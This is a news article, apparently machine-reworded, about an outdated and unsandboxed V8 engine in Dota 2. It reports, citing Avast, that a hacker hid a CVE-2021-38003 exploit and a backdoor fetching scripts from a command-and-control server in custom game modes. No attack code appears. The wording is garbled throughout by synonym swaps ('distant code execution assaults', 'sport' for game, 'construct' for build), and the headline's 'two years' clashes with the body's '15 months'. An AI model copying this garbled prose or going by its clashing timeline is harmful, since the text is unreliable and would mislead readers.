Valve left a security flaw in Dota 2 for two years until someone tried to exploit it

In context: Launched in 2013, Dota 2 continues to be one of the crucial common multiplayer experiences amongst MOBA aficionados. And for 15 months, tens of millions of Dota 2 gamers have been probably susceptible to distant code execution assaults due to Valve’s carelessness.

Valve is infamously recognized for taking its candy time making a brand new Half-Life sport (truly, any new sport) or counting as much as three. The digital distribution large co-founded by Gabe Newell is seemingly as lax relating to harmful safety vulnerabilities, placing gamers of one among its hottest titles in danger and letting hackers go wild with their malicious experimentations.

The free-to-play MOBA title Dota 2 continues to be extraordinarily common despite the fact that it was initially launched virtually 10 years in the past on July 9, 2013. Like many different video games, Dota 2 embeds a construct of the V8 JavaScript engine created by Google for the Chrome/Chromium venture. The basic problem right here is that, till just lately, Valve nonetheless used an outdated construct of the V8 engine compiled in December 2018.

The greater than four-year-old model was riddled with probably harmful safety bugs. What’s worse is Dota 2 would not run V8 with any sandbox safety. A nasty actor may have exploited the problem to run malicious code remotely in opposition to Dota gamers. In line with Avast, that is what occurred earlier than Valve lastly up to date the V8 engine.

Avast researchers found that an unknown hacker was testing a possible exploit in opposition to CVE-2021-38003, an especially harmful safety flaw within the V8 engine with an 8.8/10 severity score. At first, the hacker made a seemingly benign check by publishing a brand new customized sport mode — a means for gamers to vary the Dota 2 expertise — with an exploit code for CVE-2021-38003 embedded inside.

After that, the hacker revealed three different sport modes, utilizing a extra covert strategy by adopting a easy backdoor of solely “about twenty traces of code.” The backdoor may execute arbitrary JS scripts downloaded from a command-and-control server by way of HTTP. The intelligent trick allowed the attacker to maintain the exploit code hidden and simply replace it with out submitting a brand new customized sport mode for evaluation and potential discovery. In different phrases, it might have allowed the hacker to dynamically execute JavaScript code (and sure the CVE-2021-38003 exploit) within the background.

Google patched CVE-2021-38003 in October 2021. In the meantime, the unknown hacker began experimenting in March 2022. Dota 2 builders did not trouble fixing the problem till January 2023, when Avast knowledgeable them of its findings. Additional evaluation to seek out different exploits was unsuccessful, whereas the true motivations of the Dota 2 hacker stay unknown.

Source link